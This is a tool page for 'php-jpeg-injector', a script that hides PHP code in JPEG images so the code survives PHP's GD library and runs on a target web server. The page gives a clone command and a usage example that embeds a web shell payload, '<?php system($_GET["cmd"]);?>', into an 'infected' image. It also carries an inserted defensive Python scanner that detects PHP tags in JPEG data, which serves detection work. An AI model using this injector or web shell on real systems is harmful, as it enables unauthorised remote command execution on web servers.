php-jpeg-injector: Injects php payloads into jpeg images

Injects php payloads into jpeg images. Related to this post.

Use Case

You have a web application that runs a jpeg image through PHP’s GD graphics library.

Description

This script injects PHP code into a specified jpeg image. The web application will execute the payload if it interprets the image. Make sure your input jpeg is uncompressed!

How it works

PHP code is injected in the null/garbage (brown) space after the scan header:

[Image: the null/garbage space after the scan header, highlighted in brown]

The newly infected jpeg is run through PHP’s gd-library. PHP interprets the payload injected in the jpeg and executes it.
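A defender-side check for the placement described above, as an added example that is not part of php-jpeg-injector: it walks the JPEG's marker segments and reports PHP open tags found in segment payloads, in the scan data after the scan header, or after the end-of-image marker. The function names and the sample bytes are constructed for this illustration.

```python
PHP_TAGS = (b"<?php", b"<?=")  # "<?=" is short enough to occur by chance
SOS, EOI = 0xDA, 0xD9

def _scan_end(data, start):
    """Offset of the first real marker after entropy-coded scan data."""
    i = data.find(b"\xff", start)
    while i != -1 and i + 1 < len(data):
        nxt = data[i + 1]
        # FF00 is byte stuffing, FFD0-FFD7 are restart markers, FFFF is fill
        if nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
            return i
        i = data.find(b"\xff", i + 1)
    return len(data)

def scan_jpeg_for_php(data):
    """Return [(region, offset, tag)] for each PHP open tag in a JPEG."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    regions, pos = [], 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == EOI:  # anything after EOI is appended data
            regions.append(("trailer", pos + 2, len(data)))
            break
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        end = pos + 2 + length
        regions.append((f"segment 0x{marker:02X}", pos + 4, end))
        pos = end
        if marker == SOS:  # the scan header is followed by scan data with no length field
            pos = _scan_end(data, end)
            regions.append(("scan data", end, pos))
    hits = []
    for name, start, stop in regions:
        for tag in PHP_TAGS:
            i = data.find(tag, start, stop)
            while i != -1:
                hits.append((name, i, tag.decode()))
                i = data.find(tag, i + 1, stop)
    return hits

# Constructed sample: SOI, APP0, SOS header, scan bytes with a harmless tag, EOI
SAMPLE = (b"\xff\xd8" + b"\xff\xe0\x00\x04JF"
          + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
          + b"\x12\x34\xff\x00<?php echo 1;?>\x56" + b"\xff\xd9")

if __name__ == "__main__":
    print(scan_jpeg_for_php(SAMPLE))
```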

Download

git clone https://github.com/dlegs/php-jpeg-injector.git

Use

python3 gd-jpeg.py [JPEG] [PAYLOAD] [OUTPUT_JPEG]

e.g. python3 gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg

Source: https://github.com/dlegs/